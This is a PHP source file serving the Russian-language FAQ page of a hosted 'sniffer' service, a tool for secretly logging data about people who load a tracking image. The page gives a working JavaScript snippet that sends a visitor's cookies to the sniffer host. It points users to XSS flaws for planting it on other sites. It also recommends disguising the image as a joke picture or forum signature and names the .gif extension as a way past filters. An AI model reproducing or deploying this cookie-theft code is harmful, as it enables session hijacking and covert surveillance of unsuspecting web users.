<?
define("FILE", "faq.php");

require "config.php";

if ($styles_enabled) {
	if ($_GET['style'] and file_exists("styles/".$_GET['style'].".css")) $style_filename = $_GET['style'].".css";
		elseif ($_COOKIE['s_style'] and file_exists("styles/".$_COOKIE['s_style'].".css")) $style_filename = $_COOKIE['s_style'].".css";
	$current_style = substr($style_filename, 0, strpos($style_filename, ".css"));
	setcookie("s_style", $current_style, time()+7776000);
}
?>
<html>
<head>
<title>Сниффер - FAQ</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<link rel="stylesheet" type="text/css" href="styles/<?=$style_filename?>">
</head>

<body>
<p><b class="col">Q: Для чего нужен сниффер?</b></p>
<p><b>A:</b> Сниффер нужен, чтобы перехватить данные о&nbsp;пользователе-посетителе определенного сайта. Как только пользователь заходит на&nbsp;страницу, на&nbsp;которой размещен сниффер, его данные передаются в&nbsp;лог.</p>
<p><b class="col">Q: Какой код нужно разместить на&nbsp;странице, чтобы сниффер перехватил данные пользователя?</b></p>
<p><b>A:</b> Чтобы перехватить IP, USER-AGENT пользователя и&nbsp;URL страницы, с&nbsp;которой был вызван сниффер, достаточно разместить на&nbsp;странице тег <code>&lt;img&gt;</code>, в&nbsp;который прописать путь к&nbsp;картинке-снифферу, полученный вами при регистрации. Вот простейший код:<br>
<blockquote style="margin:8px 0 5px 8px; padding-left:4px; border-left:2px solid;">
<code>&lt;img src="[путь к снифферу]" width="1" height="1"&gt;</code>
</blockquote></p>
<p>Тот&nbsp;же эффект будет достигнут, если вы&nbsp;вручную наберете в&nbsp;браузере адрес картинки-сниффера. Помимо вышеуказанных параметров, снифферу можно передать в&nbsp;запросе произвольную информацию, отделив ее знаком <code>?</code>. В логе она окажется в поле QUERY. Если вам нужно перехватить cookies пользователя или иную информацию, известную только браузеру, не&nbsp;обойтись без использования JavaScript. Пример кода, перехватывающего cookies:<br>
<blockquote style="margin:8px 0 5px 8px; padding-left:4px; border-left:2px solid;">
<code>&lt;script&gt;img=new Image(); img.src="[путь к снифферу]?"+document.cookie;&lt;/script&gt;</code>
</blockquote>
</p>
<p>Разумеется, если у&nbsp;вас нет прямого доступа к&nbsp;странице, на&nbsp;которой вы&nbsp;собираетесь разместить код, ваши возможности разместить его &laquo;как есть&raquo; будут весьма ограничены. Для этого умные люди придумали, как использовать недоработки в&nbsp;программном коде страниц, чтобы размещать на&nbsp;них вредоносный код. Уязвимости такого рода называются XSS (Cross-Site Scripting).</p>
<p><b class="col">Q: По&nbsp;какому принципу работает сниффер?</b></p>
<p><b>A:</b> Как только снифферу приходит запрос от&nbsp;браузера пользователя, выполняется php-код, спрятанный в&nbsp;картинку, фильтрующий и&nbsp;записывающий полученные из&nbsp;запроса данные в&nbsp;текстовый файл. После чего сниффер возвращает браузеру прозрачный GIF-файл размером 1&times;1&nbsp;пикселей (<code><?=$image_filename?></code>), а&nbsp;записанные данные становятся доступны через лог. Стоит отметить, что сам сниффер тоже имеет расширение <code>.gif</code>, что позволяет ему обходить фильтры, пропускающие только адреса картинок, и&nbsp;не&nbsp;вызывать лишних подозрений у&nbsp;пользователя.</p>
<p><b class="col">Q: Я&nbsp;забыл свой адрес картинки-сниффера.</b></li>
<p><b>A:</b> <?=$sniffer_path?>[ваш логин].gif<? if ($info_line) echo "<br>Ссылка на эту картинку доступна со страницы вашего лога." ?></p>
<p><b class="col">Q: Что означает функция &laquo;Сменить вид картинки&raquo;?</b></li>
<p><b>A:</b> По&nbsp;умолчанию после работы сниффера в&nbsp;браузере отображается прозрачный GIF (см.&nbsp;выше). Вы&nbsp;можете заменить его на&nbsp;любую свою картинку, прописав путь к&nbsp;ней в&nbsp;диалоговом окне. Это очень удобно, если вам нужно разместить сниффер там, где все будут видеть, что изображено на картинке. Например, в&nbsp;подписи на&nbsp;форуме. Или, допустим, вы&nbsp;можете замаскировать сниффер под &laquo;прикольную картинку&raquo; и&nbsp;послать ссылку другу. Неплохое пространство для идей, правда?</p>
<p><b class="col">Q: Зачем нужна функция &laquo;Сохранить мои записи&raquo;?</b></li>
<p><b>A:</b> С&nbsp;помощью нее вы&nbsp;можете скачать все свои записи на&nbsp;диск в&nbsp;формате TXT. Загрузить их&nbsp;обратно в&nbsp;лог вам не&nbsp;удастся, зато сгенерированный файл будет совместим с&nbsp;<a href="http://kanick.ru/sniffer/" target="_blank">персональной версией</a> сниффера (Personal или Deluxe), где его можно использовать в качестве источника данных (см.&nbsp;настройки в&nbsp;<code>config.php</code>).</b></li>
<p><b class="col">Q: Возникают неполадки с&nbsp;интерфейсом сниффера.</b></li>
<p><b>A:</b> Проверьте, включены&nbsp;ли у&nbsp;вас cookies и&nbsp;javascript.</p>
<p><b class="col">Q: У&nbsp;меня в&nbsp;логе обычно много записей и&nbsp;сниффер очень тормозит.</b></li>
<p><b>A:</b> Тормозит не&nbsp;сниффер, а&nbsp;браузер. Вероятно, вы&nbsp;пользуетесь IE. С&nbsp;<a href="http://www.mozilla.ru" target="_blank">Firefox</a> таких проблем не&nbsp;будет. В&nbsp;крайнем случае попросите <a href="mailto:<?=$from_email?>">администратора</a> включить вам постраничный вывод записей, у&nbsp;него есть такая настройка.</p>
<p><b class="col">Q: Я не&nbsp;пользовался сниффером около месяца, зашел только что&nbsp;&#151; и&nbsp;не&nbsp;удается авторизоваться.</b></li>
<p><b>A:</b> Если ваш аккаунт не&nbsp;был активен в&nbsp;течение месяца, то, скорее всего, он&nbsp;был удален администратором без возможности восстановления. Зарегистрируйтесь заново.</p>
<p><b class="col">Q: Установлен&nbsp;ли лимит записей?</b></li>
<p><b>A:</b> <? if ($max_entries > 0) echo "Да, если в&nbsp;логе больше <b>$max_entries</b> записей, то&nbsp;по&nbsp;мере появления новых записей старые будут удаляться."; else echo "Нет, на&nbsp;данный момент количество записей в&nbsp;логе не&nbsp;ограничено."; ?></p>
<p><b class="col">Q: Я&nbsp;нашел ошибку (у&nbsp;меня есть вопрос/предложение). К&nbsp;кому обращаться?</b></p>
<p><b>A:</b> Домашняя страница сниффера&nbsp;&#151; <a href="http://kanick.ru/sniffer/" target="_blank">http://kanick.ru/sniffer/</a>. Вы&nbsp;можете связаться с&nbsp;автором. Учтите, что автор не&nbsp;располагает сведениями о&nbsp;копиях сниффера, установленных на&nbsp;чужих серверах и&nbsp;не&nbsp;может нести ответственности за&nbsp;их&nbsp;использование&nbsp;&#151; на&nbsp;некоторые вопросы вам с&nbsp;большей вероятностью даст ответ администратор сайта, на&nbsp;котором установлен сниффер, а&nbsp;не&nbsp;автор. <? if ($from_email) { ?>E-mail администратора: <a href="mailto:<?=$from_email?>"><?=$from_email?></a>.<? } ?></p>
<p><a href="#">#</a></p>
</body>
</html>